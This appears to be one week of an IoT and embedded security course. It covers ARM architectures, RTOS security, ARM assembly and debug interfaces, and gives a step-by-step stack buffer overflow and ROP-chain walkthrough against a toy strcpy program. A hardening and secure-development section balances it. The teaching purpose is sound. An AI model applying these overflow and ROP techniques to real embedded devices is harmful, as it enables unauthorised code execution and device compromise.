IoT & Embedded Systems Security
Opening Framing: The Embedded Reality
IoT security requires understanding the embedded systems that power IoT devices. Unlike
general-purpose computers, embedded systems feature specialized processors (ARM Cortex-M, MIPS,
Xtensa), run bare-metal code or real-time operating systems, and operate under severe resource
constraints. This isn't just academic—these constraints directly create exploitable vulnerabilities.
A smart thermostat might have 256KB of flash and 64KB of RAM. A fitness tracker may run on a battery
for months. A security camera processes video on a <$5 ARM Cortex-M4. These constraints shape every
security decision—or more often, the compromise. Understanding embedded architecture reveals why
certain vulnerabilities exist and how to exploit them.
Why This Week Matters
The Embedded Attack Surface: 75 billion IoT devices are projected by 2025. Every smart home,
industrial sensor, and medical device runs embedded code. Understanding ARM assembly isn't
optional: it's how you read the firmware you extract, understand exploit mitigation bypasses,
and write exploits that actually work on resource-constrained targets.
Real-World Context: Major IoT incidents and vulnerability disclosures (Mirai, VPNFilter, Ripple20)
all required an understanding of embedded systems to discover and exploit. The URGENT/11
vulnerabilities affected VxWorks across 200 million devices; exploiting them required deep
embedded knowledge.
Career Relevance: Embedded security specialists are in high demand. Companies building IoT
products, automotive systems, and medical devices need engineers who understand both security
and embedded constraints.
Learning Outcomes
By the end of this week, you will be able to:
Identify and compare ARM Cortex-M vs Cortex-A architectures
Understand memory layouts and protection mechanisms in embedded systems
Read basic ARM assembly and trace function execution
Recognize common RTOSes (FreeRTOS, Zephyr) and their security properties
Identify debug interfaces (UART, JTAG, SWD) on target boards
Explain why embedded constraints lead to specific vulnerability classes
Real-World Attack Vectors
MITRE ATT&CK for ICS Mapping:
T0823 - Exploit Public-Facing Application: Embedded web servers
T0886 - Remote Services: Debug interfaces left accessible
Key insight: Embedded systems trade security for resource efficiency. Every feature removed to save
kilobytes of flash is a potential attack vector. Understanding what's missing helps you exploit
what's present.
1) Processor Architectures
Understanding processor architectures is fundamental to IoT exploitation. Each architecture has
unique characteristics, security features, and typical deployment patterns. Knowing which processor
powers a target device tells you what tools to use, what exploits might work, and what defenses
you'll encounter.
COMMON IoT OPERATING SYSTEMS:
BARE METAL (No OS):
┌─────────────────────────────────────────────────────────────┐
│ - Direct hardware access │
│ - Simple interrupt-driven loops │
│ - Minimal attack surface │
│ - No process isolation │
│ - Common in simple sensors │
└─────────────────────────────────────────────────────────────┘
FreeRTOS:
┌─────────────────────────────────────────────────────────────┐
│ - Most popular RTOS for microcontrollers │
│ - AWS IoT integration │
│ - Task scheduling, queues, semaphores │
│ - No memory protection between tasks by default │
│ - TLS and crypto libraries available │
└─────────────────────────────────────────────────────────────┘
Zephyr:
┌─────────────────────────────────────────────────────────────┐
│ - Linux Foundation project │
│ - Strong security focus │
│ - Memory protection, secure boot support │
│ - Growing adoption in commercial IoT │
└─────────────────────────────────────────────────────────────┘
Embedded Linux:
┌─────────────────────────────────────────────────────────────┐
│ - Full Linux kernel on Cortex-A or MIPS │
│ - Familiar attack vectors (buffer overflows, privesc) │
│ - BusyBox common (minimal userland) │
│ - Often outdated kernels with known CVEs │
└─────────────────────────────────────────────────────────────┘
4) ARM Assembly Basics
ARM assembly fluency is non-negotiable for IoT exploitation. You need to read disassembly to
understand what firmware does, write shellcode to exploit vulnerabilities, and build ROP chains to
bypass protections. This section covers the essentials through a practical exploitation lens.
Registers and Calling Convention
ARM ASSEMBLY FUNDAMENTALS:
REGISTERS (ARM Cortex-M):
┌─────────────────────────────────────────────────────────────┐
│ R0-R12: General purpose │
│ R13 (SP): Stack Pointer │
│ R14 (LR): Link Register (return address) │
│ R15 (PC): Program Counter │
│ xPSR: Program Status Register (flags; called CPSR on Cortex-A) │
│ │
│ FUNCTION CALLING CONVENTION (AAPCS): │
│ Arguments: R0, R1, R2, R3 (then stack) │
│ Return value: R0 │
│ Callee-saved: R4-R11 (must preserve) │
│ Caller-saved: R0-R3, R12 (can be clobbered) │
└─────────────────────────────────────────────────────────────┘
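As a rough illustration of the calling convention above, the following Python sketch maps a list of 32-bit integer or pointer arguments to their AAPCS locations. The helper name place_arguments is made up for this example, and it deliberately ignores 64-bit and floating-point arguments, which follow additional rules.

```python
def place_arguments(args):
    """Map 32-bit integer/pointer arguments to AAPCS locations.

    Hypothetical helper for illustration only: the first four arguments
    go in R0-R3, the rest are read from the stack at function entry.
    """
    regs = {f"R{i}": value for i, value in enumerate(args[:4])}
    # Fifth and later arguments sit at increasing offsets from SP.
    stack = {f"[SP, #{4 * i}]": value for i, value in enumerate(args[4:])}
    return regs, stack


regs, stack = place_arguments([0x10, 0x20, 0x30, 0x40, 0x50, 0x60])
print(regs)
print(stack)
```

When reading disassembly, this is why values loaded into R0-R3 just before a BL are usually the callee's first four arguments.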
COMMON INSTRUCTIONS:
┌─────────────────────────────────────────────────────────────┐
│ Data Movement: │
│ MOV R0, #5 ; R0 = 5 (immediate value) │
│ MOV R0, R1 ; R0 = R1 (register to register) │
│ │
│ Arithmetic: │
│ ADD R0, R1, R2 ; R0 = R1 + R2 │
│ SUB R0, R1, #10 ; R0 = R1 - 10 │
│ MUL R0, R1, R2 ; R0 = R1 * R2 │
│ │
│ Memory Access: │
│ LDR R0, [R1] ; Load word from memory @ R1 into R0 │
│ LDR R0, [R1, #4] ; Load from R1 + 4 offset │
│ STR R0, [R1] ; Store R0 to memory @ R1 │
│ LDRB R0, [R1] ; Load byte (8-bit) │
│ │
│ Comparison & Branching: │
│ CMP R0, R1 ; Compare R0 and R1 (set flags) │
│ BEQ label ; Branch if equal (Z flag set) │
│ BNE label ; Branch if not equal │
│ BGT label ; Branch if greater than │
│ B label ; Unconditional branch (goto) │
│ │
│ Function Calls: │
│ BL function ; Branch with link (call function) │
│ ; Saves return addr in LR, jumps to func │
│ BX LR ; Branch exchange, return from function │
│ │
│ Stack Operations: │
│ PUSH {R4-R7, LR} ; Save registers to stack │
│ POP {R4-R7, PC} ; Restore and return (PC = saved LR) │
└─────────────────────────────────────────────────────────────┘
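The PUSH and POP pair is what makes a saved return address reachable from a local buffer, so it can help to model it. The sketch below is a simplified Python model of a full-descending stack; the function names and the addresses are invented for the example and do not come from any particular device.

```python
def push(memory, sp, reg_values):
    """Model PUSH {reglist} on a full-descending stack.

    reg_values lists (name, value) pairs in ascending register order;
    the lowest-numbered register ends up at the lowest address.
    """
    sp -= 4 * len(reg_values)
    for index, (_name, value) in enumerate(reg_values):
        memory[sp + 4 * index] = value
    return sp


def pop(memory, sp, names):
    """Model POP {reglist}: load registers from ascending addresses."""
    regs = {name: memory[sp + 4 * index] for index, name in enumerate(names)}
    return regs, sp + 4 * len(names)


memory = {}
# Illustrative values: R4 contents and a return address held in LR.
sp = push(memory, 0x20001000, [("R4", 0x11111111), ("LR", 0x08000123)])
regs, sp_after = pop(memory, sp, ["R4", "PC"])
print(hex(sp), {name: hex(value) for name, value in regs.items()})
```

Whatever sits in the slot written by LR is loaded straight into PC on return, which is the property a stack overflow abuses.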
Stack Buffer Overflow Exploitation
COMPLETE EXPLOITATION WALKTHROUGH:
Vulnerable C Code:
┌─────────────────────────────────────────────────────────────┐
│ #include <stdio.h> │
│ #include <string.h> │
│ │
│ void vulnerable_function(char *input) { │
│ char buffer[64]; │
│ strcpy(buffer, input); // No bounds check! │
│ printf("You entered: %s\n", buffer); │
│ } │
│ │
│ int main(int argc, char **argv) { │
│ if (argc < 2) return 1; │
│ vulnerable_function(argv[1]); │
│ return 0; │
│ } │
└─────────────────────────────────────────────────────────────┘
Compile for ARM (disable protections):
$ arm-linux-gnueabi-gcc -g -fno-stack-protector -z execstack \
-o vuln vuln.c
Generated ARM Assembly (vulnerable_function):
┌─────────────────────────────────────────────────────────────┐
│ vulnerable_function: │
│ PUSH {R4, LR} ; Save R4 and return address │
│ SUB SP, SP, #72 ; Allocate 72 bytes on stack │
│ MOV R4, R0 ; Save input pointer to R4 │
│ ADD R0, SP, #8 ; R0 = &buffer (SP+8) │
│ MOV R1, R4 ; R1 = input │
│ BL strcpy ; Call strcpy (VULNERABLE!) │
│ ... (printf call) │
│ ADD SP, SP, #72 ; Deallocate stack │
│ POP {R4, PC} ; Restore R4 and return (PC=LR) │
└─────────────────────────────────────────────────────────────┘
Stack Layout After PUSH:
┌─────────────────────────────────────────────────────────────┐
│ High Memory │
│ ┌───────────────────────────────────────────────────────┐ │
│ │ Saved LR (return address) ← TARGET! │ │
│ ├───────────────────────────────────────────────────────┤ │
│ │ Saved R4 │ │
│ ├───────────────────────────────────────────────────────┤ │
│ │ 72 bytes local storage │ │
│ │ (buffer starts at SP+8, 64 bytes) │ │
│ └───────────────────────────────────────────────────────┘ │
│ Low Memory (SP points here after SUB) │
└─────────────────────────────────────────────────────────────┘
Exploitation Strategy:
1. Buffer is 64 bytes at SP+8
2. Saved R4 is at SP+72 and saved LR at SP+76 (8 bytes below the buffer + 64-byte buffer + 4 bytes for R4)
3. strcpy will overflow buffer, overwriting saved LR
4. When function returns (POP {R4, PC}), PC gets our value
5. We control program flow!
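The offsets can be worked out directly from the prologue in the listing (PUSH {R4, LR}, SUB SP, SP, #72, buffer at SP+8). The short calculation below is only a sketch of that arithmetic; the constant names are chosen for this example.

```python
FRAME_BYTES = 72    # from SUB SP, SP, #72
BUFFER_OFFSET = 8   # from ADD R0, SP, #8
BUFFER_BYTES = 64   # char buffer[64]
WORD = 4

# PUSH {R4, LR} places R4 directly above the locals and LR above R4.
saved_r4_at = FRAME_BYTES
saved_lr_at = FRAME_BYTES + WORD

bytes_to_r4 = saved_r4_at - BUFFER_OFFSET
bytes_to_lr = saved_lr_at - BUFFER_OFFSET

print(f"saved R4 at SP+{saved_r4_at}, saved LR at SP+{saved_lr_at}")
print(f"{bytes_to_r4} bytes reach saved R4, {bytes_to_lr} bytes reach saved LR")
```

The buffer ends exactly where saved R4 begins, so 64 bytes of filler plus 4 bytes for R4 place the next 4 bytes on top of the saved return address.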
Building the Exploit:
┌─────────────────────────────────────────────────────────────┐
│ Payload structure: │
│ │
│ [ 64 bytes padding ] Fill buffer │
│ [ 4 bytes junk for R4 ] Overwrite saved R4 │
│ [ 4 bytes return address ] Overwrite saved LR │
│ │
│ Example Python exploit: │
│ payload = b"A" * 64 # Fill buffer │
│ payload += b"BBBB" # Junk for R4 │
│ payload += p32(0xdeadbeef) # New return address │
└─────────────────────────────────────────────────────────────┘
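The p32 helper used in the payload is typically provided by an exploitation library such as pwntools. A standard-library equivalent is sketched below, together with a check for null bytes, since strcpy stops copying at the first zero byte. The function build_payload is a name invented for this example.

```python
import struct


def p32(value):
    """Pack a 32-bit value little-endian (stand-in for a library p32)."""
    return struct.pack("<I", value)


def build_payload(return_address, buffer_bytes=64):
    """Build filler + saved R4 + saved LR for the frame described above."""
    payload = b"A" * buffer_bytes      # fill buffer
    payload += b"BBBB"                 # lands in saved R4
    payload += p32(return_address)     # lands in saved LR
    # Conservative check: strcpy treats the first zero byte as the end
    # of the string (a zero in the very last byte would still be written
    # as the terminator, but anything after it would be lost).
    if b"\x00" in payload:
        raise ValueError("payload contains a null byte")
    return payload


payload = build_payload(0xDEADBEEF)
print(len(payload), payload[-4:].hex())
```

Little-endian packing means the bytes appear reversed in memory, so 0xdeadbeef is sent as ef be ad de.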
GDB Debugging Workflow:
$ gdb-multiarch ./vuln
(gdb) set architecture arm
(gdb) disassemble vulnerable_function
# Identify offset to saved LR
(gdb) run $(python3 -c 'print("A"*68 + "BBBB")')
# Program crashes with PC=0x42424242 ("BBBB"); the debugger may show the low bits masked
# Confirms we control PC!
(gdb) x/20x $sp
# Examine stack to verify overwrite
Next step: Write ARM shellcode or ROP chain to gain code execution
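When the offset to the saved LR is not obvious from the disassembly, a common alternative is to send a non-repeating pattern and look up the value that ends up in PC. The sketch below is a minimal version of that idea, similar in spirit to the pattern tools shipped with exploitation frameworks; make_pattern and find_offset are names made up here, and on a real target the reported PC may need its low bits adjusted before the lookup.

```python
import itertools
import string


def make_pattern(length):
    """Return a byte pattern built from unique three-character chunks."""
    chunks = (
        upper + lower + digit
        for upper in string.ascii_uppercase
        for lower in string.ascii_lowercase
        for digit in string.digits
    )
    needed = (length + 2) // 3  # round up to whole chunks
    return "".join(itertools.islice(chunks, needed))[:length].encode()


def find_offset(pattern, pc_value):
    """Locate the little-endian bytes of pc_value in the pattern (-1 if absent)."""
    return pattern.find(pc_value.to_bytes(4, "little"))


pattern = make_pattern(100)
# Simulate a crash where the four bytes at offset 68 were loaded into PC.
crashed_pc = int.from_bytes(pattern[68:72], "little")
print(find_offset(pattern, crashed_pc))
```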
Return-Oriented Programming (ROP)
ROP EXPLOITATION ON ARM:
Why ROP?
┌─────────────────────────────────────────────────────────────┐
│ - Stack is non-executable (NX bit enabled) │
│ - Can't execute shellcode on stack │
│ - Solution: Chain existing code "gadgets" │
│ - Each gadget ends with BX LR or POP {PC} │
└─────────────────────────────────────────────────────────────┘
Finding Gadgets:
$ ROPgadget --binary ./vuln --arch arm
Useful ARM Gadgets:
┌─────────────────────────────────────────────────────────────┐
│ 0x00010420: pop {r0, pc} ; Load R0 from stack │
│ 0x00010538: pop {r3, pc} ; Load R3 from stack │
│ 0x000106a0: mov r0, r4; blx r3 ; Call function in R3 │
│ 0x00010750: ldr r0, [r4]; bx lr ; Deref pointer in R4 │
└─────────────────────────────────────────────────────────────┘
ROP Chain Example (call system("/bin/sh")):
┌─────────────────────────────────────────────────────────────┐
│ Goal: Execute system("/bin/sh") │
│ │
│ ROP payload: │
│ [padding] + [saved R4] + [ROP chain on stack] │
│ │
│ payload = b"A" * 64 │
│ payload += b"JUNK" # Saved R4 │
│ payload += p32(pop_r0) # PC → pop {r0, pc} │
│ payload += p32(binsh_addr) # R0 = "/bin/sh" │
│ payload += p32(system_addr) # PC → system() │
│ │
│ Execution flow: │
│ 1. Function returns, PC = pop_r0 gadget │
│ 2. Gadget pops binsh_addr into R0, then pops system_addr │
│ into PC │
│ 3. Now executing system() with R0 = "/bin/sh" │
│ 4. Shell spawned! │
└─────────────────────────────────────────────────────────────┘
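To check a chain before sending it, the execution flow can be replayed offline. The sketch below rebuilds the payload with the standard library and simulates the two pops. The gadget address is taken from the listing above, while BINSH_ADDR and SYSTEM_ADDR are hypothetical placeholders that would have to be resolved for a real binary.

```python
import struct

POP_R0_PC = 0x00010420    # "pop {r0, pc}" from the gadget listing
BINSH_ADDR = 0x00021F4C   # hypothetical address of a "/bin/sh" string
SYSTEM_ADDR = 0x000104A8  # hypothetical address of system()


def p32(value):
    """Pack a 32-bit value little-endian."""
    return struct.pack("<I", value)


payload = b"A" * 64 + b"JUNK"
payload += p32(POP_R0_PC) + p32(BINSH_ADDR) + p32(SYSTEM_ADDR)


def simulate(data, bytes_to_saved_r4=64):
    """Replay POP {R4, PC} followed by the pop {r0, pc} gadget."""
    r4, gadget, r0, final_pc = struct.unpack_from("<4I", data, bytes_to_saved_r4)
    return {"R4": r4, "gadget": gadget, "R0": r0, "PC": final_pc}


state = simulate(payload)
print({name: hex(value) for name, value in state.items()})
```

One caveat: these addresses have a zero high byte, so a copy through strcpy would stop after the first address. A chain like this assumes either an input path that tolerates null bytes or gadget addresses without them.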
5) Debug Interfaces
HARDWARE DEBUG INTERFACES:
UART (Universal Asynchronous Receiver/Transmitter):
┌─────────────────────────────────────────────────────────────┐
│ Purpose: Serial console access │
│ Pins: TX, RX, GND (sometimes VCC) │
│ Baud rates: 9600, 115200 common │
│ │
│ Security Value: │
│ - Often provides root shell │
│ - Boot logs reveal system information │
│ - May allow bootloader interrupt │
│ │
│ Identification: │
│ - Look for 4-pin headers on PCB │
│ - Use logic analyzer to detect baud rate │
│ - JTAGulator can automate pin identification │
└─────────────────────────────────────────────────────────────┘
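Baud-rate detection with a logic analyzer usually comes down to measuring the shortest pulse on the TX line, which approximates one bit time. The sketch below assumes the capture has already been exported as a list of pulse widths in microseconds; estimate_baud and the list of candidate rates are choices made for this example.

```python
STANDARD_BAUDS = [1200, 2400, 4800, 9600, 19200, 38400,
                  57600, 115200, 230400, 460800, 921600]


def estimate_baud(pulse_widths_us):
    """Guess the baud rate from measured pulse widths (microseconds)."""
    bit_time_us = min(pulse_widths_us)   # shortest pulse ~ one bit
    raw_rate = 1_000_000 / bit_time_us   # bits per second
    # Snap to the nearest standard rate to absorb measurement error.
    return min(STANDARD_BAUDS, key=lambda rate: abs(rate - raw_rate))


print(estimate_baud([8.7, 17.4, 26.0, 8.6]))
print(estimate_baud([104.2, 208.3, 312.5]))
```

A short capture may not contain an isolated single-bit pulse, so the estimate is more reliable when the device is printing a lot of text, for example during boot.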
JTAG (Joint Test Action Group):
┌─────────────────────────────────────────────────────────────┐
│ Purpose: Debugging and testing │
│ Pins: TDI, TDO, TCK, TMS, (TRST) │
│ │
│ Capabilities: │
│ - Full processor control (halt, step, run) │
│ - Read/write memory │
│ - Read/write registers │
│ - Dump flash contents │
│ │
│ Tools: OpenOCD, JLink, Bus Pirate │
└─────────────────────────────────────────────────────────────┘
SWD (Serial Wire Debug):
┌─────────────────────────────────────────────────────────────┐
│ Purpose: ARM's 2-wire alternative to JTAG │
│ Pins: SWDIO, SWCLK │
│ Common on: ARM Cortex-M devices │
│ Same capabilities as JTAG │
└─────────────────────────────────────────────────────────────┘
🛡️ Defensive Architecture & Secure Embedded Development
Offensive skills show you how embedded systems break.
Defensive skills show you how to build them securely from day one.
Secure Embedded Development Principles
Building secure embedded systems requires understanding the constraints and working with them,
not against them. Security isn't about adding megabytes of protection; it's about minimizing
attack surface and using hardware security features effectively.
Memory Protection Configuration
ARM Cortex-M MPU Configuration:
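// SIZE and AP macros below are project-defined, not standard CMSIS names
// Region 0: code (flash), read-only and executable (XN must stay clear)
MPU->RBAR = FLASH_BASE | MPU_RBAR_VALID_Msk | 0;
MPU->RASR = MPU_RASR_ENABLE_Msk |
            MPU_RASR_SIZE_512KB | MPU_RASR_AP_ROPRIV;
// Region 1: data (RAM), read-write, execute-never
MPU->RBAR = RAM_BASE | MPU_RBAR_VALID_Msk | 1;
MPU->RASR = MPU_RASR_ENABLE_Msk | MPU_RASR_XN_Msk |
            MPU_RASR_SIZE_64KB | MPU_RASR_AP_RWPRIV;
// Enable the MPU, keeping the default memory map for privileged code
MPU->CTRL = MPU_CTRL_ENABLE_Msk | MPU_CTRL_PRIVDEFENA_Msk;
__DSB(); // Make sure the new MPU settings have taken effect
__ISB(); // before any following instruction is fetched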
Result: Code execution from RAM blocked, preventing shellcode.
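The size and permission macros in a configuration like this expand to bit fields in the ARMv7-M MPU_RASR register. The sketch below computes those fields in Python for a 512KB read-only executable flash region and a 64KB read-write execute-never RAM region. It leaves the memory-attribute bits (TEX, S, C, B) at zero for simplicity, and the helper names are invented for the example.

```python
AP_PRIV_RW = 0b001  # privileged read-write, no unprivileged access
AP_PRIV_RO = 0b101  # privileged read-only, no unprivileged access


def rasr_size_field(region_bytes):
    """Encode a region size: region is 2**(SIZE + 1) bytes, minimum 32."""
    if region_bytes < 32 or region_bytes & (region_bytes - 1):
        raise ValueError("region size must be a power of two >= 32 bytes")
    return region_bytes.bit_length() - 2


def build_rasr(region_bytes, ap, execute_never):
    """Assemble ENABLE, SIZE, AP and XN into one register value."""
    value = 1                                    # ENABLE, bit 0
    value |= rasr_size_field(region_bytes) << 1  # SIZE, bits 5:1
    value |= ap << 24                            # AP, bits 26:24
    value |= int(execute_never) << 28            # XN, bit 28
    return value


flash_rasr = build_rasr(512 * 1024, AP_PRIV_RO, execute_never=False)
ram_rasr = build_rasr(64 * 1024, AP_PRIV_RW, execute_never=True)
print(hex(flash_rasr), hex(ram_rasr))
```

Checking that no region is both writable and executable (XN clear together with a read-write AP value) is a quick way to audit a W^X configuration.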
Secure Coding for Embedded
Common Embedded Vulnerabilities & Mitigations:
VULNERABILITY: Stack buffer overflow
BAD: char buf[32]; strcpy(buf, user_input);
GOOD: char buf[32]; strncpy(buf, user_input, sizeof(buf)-1);
buf[sizeof(buf)-1] = '\0';
VULNERABILITY: Integer overflow leading to buffer overflow
BAD: uint8_t len = get_length(); // Length silently truncated to 8 bits
char *buf = malloc(len); // No upper bound, no NULL check
memcpy(buf, data, len);
GOOD: uint16_t len = get_length();
if (len > MAX_ALLOWED) return ERROR;
char *buf = malloc(len + 1); // Account for null
if (!buf) return ERROR;
memcpy(buf, data, len);
buf[len] = '\0'; // Terminate explicitly
VULNERABILITY: Hardcoded credentials
BAD: const char wifi_password[] = "password123";
GOOD: Store credentials in secure flash region or secure element
Use device-unique keys, never hardcode
VULNERABILITY: Unprotected debug interfaces
BAD: UART always enabled with root shell
GOOD: Disable UART in production builds
If needed, require authentication
Use TrustZone to isolate debug functionality
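The integer truncation case is easy to underestimate, so here is a small Python model of it. It assumes a hypothetical device that reports a 16-bit length field and a limit MAX_ALLOWED of 256; both the limit and the helper names are invented for the example.

```python
MAX_ALLOWED = 256  # hypothetical upper bound on accepted lengths


def as_uint8(value):
    """Model storing a value in a uint8_t."""
    return value & 0xFF


def as_uint16(value):
    """Model storing a value in a uint16_t."""
    return value & 0xFFFF


def checked_length(reported):
    """Mirror the GOOD pattern: keep the full width, then bound it."""
    length = as_uint16(reported)
    if length > MAX_ALLOWED:
        return None  # reject instead of truncating
    return length


reported = 300
print(as_uint8(reported))        # size the BAD code would allocate
print(checked_length(reported))  # GOOD code rejects the request
```

If any later copy uses the original 300-byte length while the allocation used the truncated 44 bytes, the result is a heap overflow.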
Hardening Checklist
Embedded System Hardening:
✓ Enable MPU/MMU if available
✓ Configure readable/writable/executable permissions
✓ Implement stack canaries (compiler flag: -fstack-protector-all)
✓ Disable JTAG/SWD in production (fuse programming)
✓ Implement secure boot with signature verification
✓ Use hardware crypto accelerator, never roll your own crypto
✓ Generate unique device keys during manufacturing
✓ Implement firmware encryption at rest
✓ Enable anti-rollback protection
✓ Implement input validation on all external data
✓ Minimize code size (reduce attack surface)
✓ Disable unused peripherals and services
✓ Implement watchdog timer for fault recovery
✓ Use TLS 1.3 for network communication
✓ Implement proper random number generation (TRNG)
Real-World Breach: VPNFilter (2018)
VPNFilter infected 500,000+ routers and NAS devices running embedded Linux.
The malware survived reboots by writing to flash, demonstrating persistence
on embedded systems.
Attack Vector: Exploited default credentials and unpatched
vulnerabilities in embedded web servers. Once root access was gained, the malware
wrote itself to flash for persistence.
Lessons Learned:
Disable default credentials: force a password change on first boot
Implement automatic security updates for embedded devices
Use code signing and verified boot to prevent persistent malware
Implement network segmentation: place IoT devices on a separate VLAN
Monitor for anomalous firmware modifications
Secure SDLC for Embedded
Embedded Security Development Lifecycle:
1. Requirements Phase:
- Define threat model (STRIDE for embedded)
- Specify security requirements (encryption, auth, updates)
- Choose hardware with security features (MPU, crypto accelerator)
2. Design Phase:
- Architecture review: minimize privileged code
- Define trust boundaries (TrustZone secure/normal world)
- Plan key management and provisioning
3. Implementation Phase:
- Follow MISRA C or CERT C coding standards
- Use static analysis (Coverity, CodeSonar)
- Implement security features early, not as add-ons
4. Verification Phase:
- Fuzzing on protocol parsers
- Penetration testing (hardware and firmware)
- Side-channel analysis if handling secrets
5. Manufacturing:
- Secure key injection (HSM-based)
- Disable debug interfaces via efuses
- Verify secure boot before shipping
6. Deployment & Maintenance:
- Implement OTA updates with signing
- Monitor for vulnerabilities in dependencies
- Have incident response plan
Defensive Labs
Lab: Configure ARM Cortex-M MPU for W^X
Download ARM Cortex-M example code, configure the MPU to enforce
write-xor-execute (W^X) policy. Test that code execution from RAM fails.
Verify that buffer overflows cannot lead to shellcode execution.
Tools: QEMU ARM emulator, GCC ARM cross-compiler
Time: 60 minutes
Lab: Implement Secure Boot Verification
Write a simple bootloader that verifies firmware signature before execution.
Use RSA-2048 or ECDSA-P256. Test that tampered firmware is rejected.
Implement fallback to recovery mode on verification failure.
Tools: OpenSSL for key generation and signing, ARM toolchain
Time: 90 minutes
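The control flow of a verifying bootloader can be prototyped before touching hardware. The sketch below shows a verify-then-boot decision with an anti-rollback check and a recovery fallback. To stay within the Python standard library it uses HMAC-SHA256 as a stand-in for the RSA-2048 or ECDSA-P256 signature check the lab asks for, so it demonstrates the decision logic rather than real asymmetric verification. The key, function names, and version scheme are all assumptions made for this example.

```python
import hashlib
import hmac

# Hypothetical key for illustration; real designs keep keys in protected storage.
DEVICE_KEY = b"example-device-key"


def sign_firmware(image, version, key=DEVICE_KEY):
    """Produce an authentication tag over the version header and image."""
    header = version.to_bytes(4, "little")
    return hmac.new(key, header + image, hashlib.sha256).digest()


def select_boot_target(image, version, tag, min_version, key=DEVICE_KEY):
    """Return "firmware" only if the tag verifies and the version is allowed."""
    expected = sign_firmware(image, version, key)
    if not hmac.compare_digest(expected, tag):
        return "recovery"   # tampered or wrongly signed image
    if version < min_version:
        return "recovery"   # anti-rollback: refuse older firmware
    return "firmware"


image = b"\x00\x01 example firmware image"
tag = sign_firmware(image, version=3)
print(select_boot_target(image, 3, tag, min_version=2))
print(select_boot_target(image + b"!", 3, tag, min_version=2))
```

Binding the version number into the signed data matters: otherwise an attacker could relabel an old, vulnerable image with a newer version number.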
📚 Building on CSY101 Week-13: Use STRIDE to threat model your
embedded system design before implementing.
CSY102 Week-08: Apply cryptographic principles for secure boot and firmware
encryption.
📚 Building on Prior Knowledge
Embedded security connects directly to earlier foundations:
CSY102 Week 08 (Cryptography): Implement AES, ECC on resource-constrained
devices.
CSY103 (Programming): C programming skills are essential for embedded development
and exploitation.
CSY104 Week 06 (OS Internals): RTOS concepts build on general OS knowledge.
🎯 Hands-On Labs (Free & Essential)
Apply what you learned through practical embedded system challenges. Complete these labs
to build hands-on ARM and embedded exploitation skills.
🎮 Azeria Labs: ARM Assembly Basics
What you'll do: Learn ARM assembly from scratch through interactive tutorials.
Understand registers, memory addressing, function calling conventions, and stack operations.
Write and debug simple ARM programs.
Why it matters: ARM assembly is the language of IoT exploitation. You
can't write exploits, analyze malware, or reverse engineer firmware without reading ARM code.
This is foundational for all future IoT security work.
Time estimate: 2-3 hours
What you'll do: Complete the Phoenix ARM exploitation challenges. Start with
stack buffer overflows, progress to format string vulnerabilities, and finish with ROP chains.
Each challenge builds on the previous.
Why it matters: These are real exploitation techniques used against
embedded devices. The skills transfer directly to IoT device exploitation. Understanding how to
exploit ARM binaries is essential for offensive IoT security.
Time estimate: 4-5 hours
What you'll do: Set up QEMU to emulate ARM devices. Install an ARM cross-compilation
toolchain. Compile and run a simple ARM program in QEMU. Set up GDB debugging for ARM binaries.
Why it matters: You can't always test on physical hardware. QEMU
emulation lets you analyze ARM firmware without the device. This setup is used throughout the
rest of the course for firmware analysis.
Time estimate: 1-1.5 hours
💡 Lab Strategy: Start with Azeria Labs to build ARM fundamentals. Then tackle
Phoenix challenges to apply exploitation techniques. Set up QEMU for future firmware analysis work.
Total: 700 XP across 7-9 hours of hands-on learning!
Guided Lab: ARM Assembly with Azeria Labs
Objective: Complete basic ARM assembly exercises to understand embedded code
execution.
Time: 90 minutes
Lab Steps
Set up ARM Environment (20 min):
Use QEMU ARM emulator or Raspberry Pi
Install cross-compiler: arm-linux-gnueabi-gcc
Complete Azeria Labs Part 1 (30 min):
Visit azeria-labs.com ARM Assembly Basics
Work through registers and memory instructions
Analyze a Simple Buffer Overflow (40 min):
Write vulnerable C program with strcpy
Compile with -fno-stack-protector
Use GDB to trace execution and observe LR overwrite
Success Criteria: Successfully traced ARM program execution and
demonstrated stack buffer overflow control of PC.
Reading Resources (Free + Authoritative)
Complete the required resources to deepen your embedded systems understanding.